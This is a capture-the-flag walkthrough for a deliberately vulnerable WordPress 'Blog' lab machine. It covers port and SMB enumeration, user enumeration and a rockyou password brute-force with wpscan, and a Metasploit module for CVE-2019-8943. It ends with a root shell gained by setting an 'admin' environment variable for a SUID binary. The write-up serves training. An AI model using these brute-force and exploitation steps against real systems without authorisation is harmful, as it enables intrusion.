Billy Joel made a Wordpress blog!

Objectives

Capture two flags from the box

Steps

Since the task tells us to add blog.thm to the hosts file let’s do that before we start running anything on it.

Enumeration

As always lets start with a basic portscan

Nmap scan report for <IP>
Not shown: 998 closed ports
22/tcp  open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel&#039;s IT Blog &#8211; The IT blog
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have HTTP and SMB open. Let’s check out the SMB share

SMB

Let’s scan the machine with smbmap to check for available shares

» smbmap.py -H <IP>
[+] Finding open SMB ports....
[+] Guest SMB session established on <IP>...
[+] IP: <IP>:445 Name: blog.thm
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        BillySMB                                                READ, WRITE     Billy's local SMB Share
        IPC$                                                    NO ACCESS       IPC Service (blog server (Samba, Ubuntu))

Let’s try to get the files from the BillySMB share as it’s the one that stands out

» smbclient //10.10.29.18/BillySMB
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 11 00:52:57 2020
  ..                                  D        0  Tue May 26 19:58:23 2020
  Alice-White-Rabbit.jpg              N    33378  Tue May 26 20:17:01 2020
  tswift.mp4                          N  1236733  Tue May 26 20:13:45 2020
  check-this.png                      N     3082  Tue May 26 20:13:43 2020

                15413192 blocks of size 1024. 9737512 blocks available

If we download the files we don’t see anything obvious. We can check the jpg with stegsolve

» steghide extract -sf Alice-White-Rabbit.jpg
Enter passphrase:
wrote extracted data to "rabbit_hole.txt".
» cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.

So since this is a rabbit hole let’s check out the HTTP server

HTTP

When we visit the website we see a basic blog. From the room description we know it’s running wordpress.

With that we can scan it using wpscan (I’ll remove the unnecessary info)

» wpscan --url blog.thm -e u
Interesting Finding(s):

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
 |  - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] kwheel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] bjoel
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

We see the site is using WP version 5.0 and it found two users: kwheel and bjoel.

Room tags are hinting at a CVE (CVE-2019-8943) which is a vulnerability allowing for writing files with arbitrary paths thanks to path traversal in wp_crop_image(). If we read a bit more about this vuln we can find out that it requires a user account. Thankfully we got the two usernames here so let’s try bruteforcing at least one of them.

Since wpscan has a bruteforce feature we can use that.

» wpscan --url blog.thm -U kwheel,bjoel -P /opt/wordlists/rockyou.txt --password-attack wp-login -t 64
<RANDOM THINGS>

[SUCCESS] - kwheel / <REDACTED>

After around two minutes we succesfully gained a user account which we can now use to gain a shell.

CVE-2019-8943 - metasploit

Metasploit contains a module that exploits this vulnerability which we can use to gain a shell. exploit/multi/http/wp_crop_rce

Shell

Now that we have a shell we can check for other users on the system

$ ls /home
bjoel

Privesc

Looking through the system we can’t find a way to get to bjoel but we can see a suid binary that stands out a bit with it being in /usr/sbin

$ /usr/sbin/checker
Not an Admin

The program prints out a string but doesn’t seem like it does anything else so let’s check it with ghidra.

Ghidra decompiler shows us a program looking something like this (the code below has been cleaned up a bit)

int main(void) {
  char *adminEnv = getenv("admin");

  if (adminEnv == (char *)0x0) {
    puts("Not an Admin");
  } else {
    setuid(0);
    system("/bin/bash");
  }

  return 0;
}

We can see this program just gets the “admin” env variable and checks if it’s not null so we can easily bypass this by setting it to anything.

$ admin=a /usr/sbin/checker
id
uid=0(root) gid=33(www-data) groups=33(www-data)

Now we can read the root flag, check out the bjoel’s files and find his hidden user flag in /media

Thanks to:

Nameless0ne for creating this room
you for reading.
Hope you learned something :)